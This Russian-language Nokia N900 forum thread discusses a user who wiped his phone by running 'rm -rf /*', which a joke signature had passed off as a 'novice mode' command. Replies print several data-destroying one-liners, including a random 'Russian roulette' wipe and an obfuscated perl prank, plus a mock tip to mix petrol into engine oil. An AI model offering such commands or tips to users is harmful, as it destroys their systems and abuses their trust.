1

Тема: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

shaihkritzer пишет:

какой только бред уже не пишут под N900. вы бы хотя бы этим форум не засоряли...

Уваюжаемый пользователь спасибо что вы написали следующие: Если N900 для тебя слишком сложный аппарат, существует команда, включающая режим новичка: root; rm -rf /*. Инфа 100%.  Решил проверить что за инфа и превратил свой тел в керпич. Теперь благодоря Вам осталься я на целый день без телефона (А он мне очень нужен по бизнесу сегодня для телефонных переговоров и контактах, т.е. Вы понимаете что благодаря Вашей информации Сегодня Я понесу большие убытки (И кто их будет оплачивать Наверное ВЫ?).

2

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

Алексей пишет:
shaihkritzer пишет:

какой только бред уже не пишут под N900. вы бы хотя бы этим форум не засоряли...

Уваюжаемый пользователь спасибо что вы написали следующие: Если N900 для тебя слишком сложный аппарат, существует команда, включающая режим новичка: root; rm -rf /*. Инфа 100%.  Решил проверить что за инфа и превратил свой тел в керпич. Теперь благодоря Вам осталься я на целый день без телефона (А он мне очень нужен по бизнесу сегодня для телефонных переговоров и контактах, т.е. Вы понимаете что благодаря Вашей информации Сегодня Я понесу большие убытки (И кто их будет оплачивать Наверное ВЫ?).

Налог на доверчивость/ленность/ламерство. Если к тебе на улице подойдёт человек и скажет «суть руку в этот вот чёрный ящик и будет тебе счастье» ты сунешь? Кстати на улице шанс на неприятный сюрприз меньше чем в интернете, там в случае чего можно по роже дать, милиция опять-же.
Мог-бы сначала спросить в теме «вопросы новичков» или почитать справку по команде rm. Википедия знает всё «rm (от англ. remove) — утилита в UNIX и UNIX-подобных системах, используемая для удаления файлов из файловой системы. <…> Внимание! Часто, в различных конференциях более знающие пользователи, при просьбе дать совет более молодому, предлагают ввести в консоль команду sudo rm -rf /, которая в свою очередь удаляет все содержимое корневой папки.»
http://ru.wikipedia.org/wiki/Rm

На форуме появляюсь редко, но N900 пользоваться не перестал, если вдруг что-то нужно пишите в jabber или eMail
Jabber: mrclon@jabnet.org

Поделиться

3

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

MrClon пишет:
Алексей пишет:

Уваюжаемый пользователь спасибо что вы написали следующие: Если N900 для тебя слишком сложный аппарат, существует команда, включающая режим новичка: root; rm -rf /*. Инфа 100%.  Решил проверить что за инфа и превратил свой тел в керпич. Теперь благодоря Вам осталься я на целый день без телефона (А он мне очень нужен по бизнесу сегодня для телефонных переговоров и контактах, т.е. Вы понимаете что благодаря Вашей информации Сегодня Я понесу большие убытки (И кто их будет оплачивать Наверное ВЫ?).

Налог на доверчивость/ленность/ламерство. Если к тебе на улице подойдёт человек и скажет «суть руку в этот вот чёрный ящик и будет тебе счастье» ты сунешь? Кстати на улице шанс на неприятный сюрприз меньше чем в интернете, там в случае чего можно по роже дать, милиция опять-же.
Мог-бы сначала спросить в теме «вопросы новичков» или почитать справку по команде rm. Википедия знает всё «rm (от англ. remove) — утилита в UNIX и UNIX-подобных системах, используемая для удаления файлов из файловой системы. <…> Внимание! Часто, в различных конференциях более знающие пользователи, при просьбе дать совет более молодому, предлагают ввести в консоль команду sudo rm -rf /, которая в свою очередь удаляет все содержимое корневой папки.»
http://ru.wikipedia.org/wiki/Rm

Тело конечно перешил (благо на работе шнур был и на карте резервную копию 3 дня назад делал). Но по поводу доверчивости скажу то, что на форуме такое не пишут (Потому-что форум построен на доверии и помощи друг другу). Ну с другой стороны я давно хотел его ребутнуть (тормоза были), но ждал PR 1.3.

Поделиться

4 (06.10.2010 11:06:09 отредактировано sa1nt)

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

Алексей пишет:

(Потому-что форум построен на доверии и помощи друг другу).

как утопично smile
вся жизнь тогда уж с такой точки зрения должна превратиться в утопию и быть построена на доверии и помощи друг-другу.
поэтому на правах лучшего друга, по-секрету предлагаю разбавить масло в двигателе бензином и антифризом(чем больше-тем лучше) - тогда оно густеть не будет  wink

Капитан Очевидность пишет:

однако, в большинстве своём, такой тюненх заканчивается капиталкой или заменой движка

русская рулетка для вашего линукса:
[ $[ $RANDOM % 6 ] == 0 ] && sudo rm -rf /* || echo "Ваша система ещё жива"

Поделиться

5

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

sa1nt пишет:
Алексей пишет:

(Потому-что форум построен на доверии и помощи друг другу).

как утопично smile
вся жизнь тогда уж с такой точки зрения должна превратиться в утопию и быть построена на доверии и помощи друг-другу.
поэтому на правах лучшего друга, по-секрету предлагаю разбавить масло в двигателе бензином и антифризом(чем больше-тем лучше) - тогда оно густеть не будет  wink

Капитан Очевидность пишет:

однако, в большинстве своём, такой тюненх заканчивается капиталкой или заменой движка

))))))))))))))) блин ну это понятно (Вообще я не доверчивый особенно в инете, но тут блин доверился и развели), сам виноват. Придется все команды изучать (Давно бы изучил тока времени поспать даже нет(((()

Поделиться

6

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

Не обязательно все изучать, просто по ходу дела - видите, что вам предлагают что-то ввести - ну не грех загуглить эту командочку и глянуть че за зверь, ну или хотя бы тупо в консоли вбить команду с параметром --help
например:
rm --help
и почитать краткую справку.

[size=2]Nokia N900 - MyDocs 29GB vfat, / @ microSD-Class10 ext4, custom kernel-bfs @ 1.0Ghz,
BASH default shell, root without sudser & rootsh, modded pulseaudio
[/size]

Поделиться

7

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

Мужики, по-моему тут всё ясно. Человек нарвался сам, но подпись такая (давно заметил, даже кажется где-то отреагировал) есть нарушение элементарной этики на форуме, что должно приниматься во внимание модераторами. Тему можно закрывать.

Вопрос "Ё-моё, что ж я сделал?" © ? типичная постановка обратной задачи.

Поделиться

8 (06.10.2010 15:31:44 отредактировано Serotonine)

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

а не проще б в яндексе было вбить rm -rf? это как бурление г*вн по поводу команды: sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'. скока псевдогиков нарывалось, сидящих от root'а)) так же бездумно вписали команду в консоль big_smile

Поделиться

9 (13.10.2010 23:09:51 отредактировано shaihkritzer)

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

бугога, только сейчас заметил big_smile

ну блин, юмора не понимаете. кстати, товарищ же rootsh додумался установить. значит следовало бы надеяться, что додумается и команду проверить. ибо я думал, что те, кому "режим новичка" может понадобиться, не додумаются про rootsh и ничего себе не повредят.

а вообще эта подпись была что-то типа знака протеста против поощрения администрацией форума нубов и ламерства. так что не меня вините.

з.ы. про вас даже комикс нарисовали:

http://i55.tinypic.com/2cz69oy.jpg

Communications: 3210 > 3310 > 6310 > 6310i > 6610 > 3230 > 7610 > N95-1 > Nokia N900, +Toshiba G900; Audio: iRiver PMP-120 > Cowon Q5W 60gb; Photo: Sony H9 > Nikon D7000?; Video: Sony DCR-SR42E > Sony NEX-VG10E?.

Поделиться

10

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

shaihkritzer пишет:

бугога, только сейчас заметил big_smile

а вообще эта подпись была что-то типа знака протеста против поощрения администрацией форума нубов и ламерства. так что не меня вините.

А для кого форум-то?

WM -> Android -> iOS (iPod Touch) -> Symbian -> Maemo-> Meego?

Поделиться

11

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

странный комикс smile

Поделиться

12

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

shaihkritzer пишет:

а вообще эта подпись была что-то типа знака протеста против поощрения администрацией форума нубов и ламерства. так что не меня вините

Полезно при этом помнить, что все мы всегда в чем-то нубы и ламеры.

Вопрос "Ё-моё, что ж я сделал?" © ? типичная постановка обратной задачи.

Поделиться

13

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

virtual_one пишет:
shaihkritzer пишет:

бугога, только сейчас заметил big_smile

а вообще эта подпись была что-то типа знака протеста против поощрения администрацией форума нубов и ламерства. так что не меня вините.

А для кого форум-то?

Для общения умных людей на тему Maemo и ко.

На форуме появляюсь редко, но N900 пользоваться не перестал, если вдруг что-то нужно пишите в jabber или eMail
Jabber: mrclon@jabnet.org

Поделиться

14

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

MrClon пишет:

Для общения умных людей на тему Maemo и ко.

И это говорит человек, который, наверное, больше всех сообщений оставил в теме помощи новичкам wink

Форум для всех, кому интересно. Вопрос закрыт.

На то, о чем можно спросить на форуме, не отвечаю через личные сообщения, аську, почту и т.п. для общения есть jabber-конференция: maemo@conference.jabber.org.
QKit - инструментарий для быстрого кроссплатформенного создания приложений на QML.
FAQ по Nokia N9 - читаем, пополняем.
Прежде, чем задать вопрос, воспользуйтесь поиском!

Сайт KiRiK

Поделиться

15

Re: Отделено от "ThinkContacts - управляем Nokia N900 силой мысли"

KiRiK пишет:
MrClon пишет:

Для общения умных людей на тему Maemo и ко.

И это говорит человек, который, наверное, больше всех сообщений оставил в теме помощи новичкам wink

В «Помощи новичкам» отписывался в основном до покупки N900, надо-же сначала выяснить на что собираешься выкинуть деньги. Потом отписывался там в основном таки-помогая новичкам (ну либо в процессе срачей).
Да и вообще: лучше задать дурацкий вопрос чем вводить от рута rm -rf / или купить устройство сладить с которым в принципе не способен и потом возмущаться.

P.S. а твоих-то постов там по более будет (;

На форуме появляюсь редко, но N900 пользоваться не перестал, если вдруг что-то нужно пишите в jabber или eMail
Jabber: mrclon@jabnet.org

Поделиться